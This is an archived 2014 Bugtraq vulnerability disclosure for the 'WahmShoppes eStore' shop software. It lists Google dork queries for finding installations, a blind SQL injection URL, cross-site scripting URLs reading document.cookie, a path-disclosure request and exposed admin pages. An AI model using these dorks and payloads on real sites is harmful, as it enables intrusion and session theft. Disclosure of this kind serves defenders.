[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
multiple Vulnerability in "WahmShoppes eStore"
- To: bugtraq@xxxxxxxxxxxxxxxxx
- Subject: multiple Vulnerability in "WahmShoppes eStore"
- From: cseye_ut@xxxxxxxxx
- Date: Thu, 5 Jun 2014 14:23:52 GMT
#+++++++++++++++++++++++++++++++++++++++++++++++++++++++++
# Title : multiple Vulnerability in "WahmShoppes eStore"
# Author : alieye
# vendor : http://www.wahmshoppes.com/
# Contact : cseye_ut@xxxxxxxxx
# Risk : High
# Class: Remote
# Google Dork:
# inurl:WsError.asp
# inurl:store/ We apologize but your request rendered no results
# Version: all version
# Date: 05/06/2014
#++++++++++++++++++++++++++++++++++++++++++++++++++++++++
1-Blind SQL Injection
http://victim.com/store/WsDefault.asp?One=-999 AND 1=1+UNION+SELECT+...etc
---------------------------------------------------------
2-Cross Site Scripting
http://victim.com/store/WsError.asp?msg=%3Cscript%3Ealert%28document.cookie%29%3C/script%3E
http://victim.com/store/WsRequestpwd.asp?msg=%3Cscript%3Ealert%28document.cookie%29%3C/script%3E
---------------------------------------------------------
3-Information Disclosure in image location
http://victim.com/store/thumb.asp?path=X:/server path and domain
name/example.jpg
---------------------------------------------------------
4-show admin panel tools
http://victim.com/store/frmLeft.asp
---------------------------------------------------------
Admin page
http://victim.com/store/admin/Default.asp
#++++++++++++++++++++++++++++++++++++++++++++++++++++++++
[#] Spt Tnx To ZOD14C , 4l130h1 , bully13 , andelos , 3.14nnph , f4rm4nd3 and
all cseye members
[#] Thanks To All Iranian Hackers
[#] website : http://cseye.vcp.ir/
#++++++++++++++++++++++++++++++++++++++++++++++++++++++++